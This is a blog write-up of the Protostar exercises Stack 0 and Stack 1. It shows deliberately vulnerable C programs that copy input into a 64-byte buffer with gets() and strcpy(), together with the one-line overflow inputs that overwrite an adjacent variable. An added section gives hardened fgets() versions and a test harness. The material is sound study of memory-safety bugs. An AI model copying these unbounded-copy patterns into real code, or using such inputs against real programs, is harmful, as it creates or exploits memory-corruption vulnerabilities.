<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-1</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="http://localhost:4000/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<link rel="canonical" href="{{ site.url }}{{ page.url }}" />
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="http://localhost:4000/category">CATEGORY</a></li>
<li><a href="http://localhost:4000/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i>exploit-exercises</li>
<li><i class="fa fa-tag"></i>protostar</li>
<li><i class="fa fa-tag"></i>hacking</li>
</ul>
<p id="postMeta">posted on 14 Jun 2016 under category <a href="http://localhost:4000/category/">writeup</a></p>
</header>
<h1 id="stack-0">Stack 0</h1>
<p>Here's what we're given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program reads a line into <code class="highlighter-rouge">buffer</code> with <code class="highlighter-rouge">gets()</code>, which never checks how much it writes, and then checks whether the <code class="highlighter-rouge">modified</code> variable has changed. If <code class="highlighter-rouge">modified</code> is laid out right after <code class="highlighter-rouge">buffer</code> on the stack, I'm guessing a string longer than 64 bytes will spill into it. Let's see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Here's the code we're given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;err.h&gt;   /* for errx(); missing from the original listing */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
</code></pre>
</div>
<p>Just like Stack 0, we're given a 64-byte <code class="highlighter-rouge">buffer</code> that we fill, except this time the input comes from the first command-line argument through <code class="highlighter-rouge">strcpy()</code>, and <code class="highlighter-rouge">modified</code> has to equal <code class="highlighter-rouge">0x61626364</code> instead of just being changed like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so I'll input the four bytes of that value in reverse order. First, a sanity check with exactly 64 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
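<p>Both exercises come down to the same defect: an unbounded write into a 64-byte stack buffer, first through <code class="highlighter-rouge">gets()</code> and then through <code class="highlighter-rouge">strcpy()</code>. As an added example (my own code, not Protostar's or the post's), here are the two programs with bounded input, plus a small harness that feeds constructed inputs through <code class="highlighter-rouge">fmemopen()</code>; the names <code class="highlighter-rouge">safe_stack0</code>, <code class="highlighter-rouge">safe_stack1</code> and <code class="highlighter-rouge">run_stack0</code> are my own.</p>

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() in the harness below */
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 64

/* Stack 0 hardened: fgets() writes at most BUF_SIZE bytes (NUL included), so
 * byte 65 of the input never reaches 'modified'. Returns the value of
 * 'modified' after the read, or -1 when there was no input at all. */
int safe_stack0(FILE *in)
{
    volatile int modified = 0;
    char buffer[BUF_SIZE];
    if (fgets(buffer, sizeof buffer, in) == NULL)
        return -1;
    return modified;
}

/* Stack 1 hardened: reject any argument that does not fit together with its
 * NUL. Note that 64 characters are already one too many: strcpy() would put
 * the terminator into the byte after the buffer, which is the 0x00000000 the
 * post sees. Returns 'modified' after the copy, or -1 when rejected. */
int safe_stack1(const char *arg)
{
    volatile int modified = 0;
    char buffer[BUF_SIZE];
    if (arg == NULL || strlen(arg) >= sizeof buffer)
        return -1;
    memcpy(buffer, arg, strlen(arg) + 1);
    return modified;
}

/* Harness (my own, not Protostar's): feed n constructed 'A's plus a newline
 * to safe_stack0 through an in-memory stream and return its result. */
int run_stack0(size_t n)
{
    char input[256];
    FILE *in;
    int result;
    if (n > sizeof input - 2)
        return -2;
    memset(input, 'A', n);
    input[n] = '\n';
    input[n + 1] = '\0';
    if ((in = fmemopen(input, n + 1, "r")) == NULL)
        return -3;
    result = safe_stack0(in);
    fclose(in);
    return result;
}
```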
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i><a href="mailto:paulsw.pw@gmail.com">paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i><a href="https://www.github.com/paulwalko">https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
<script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
</body>
</html>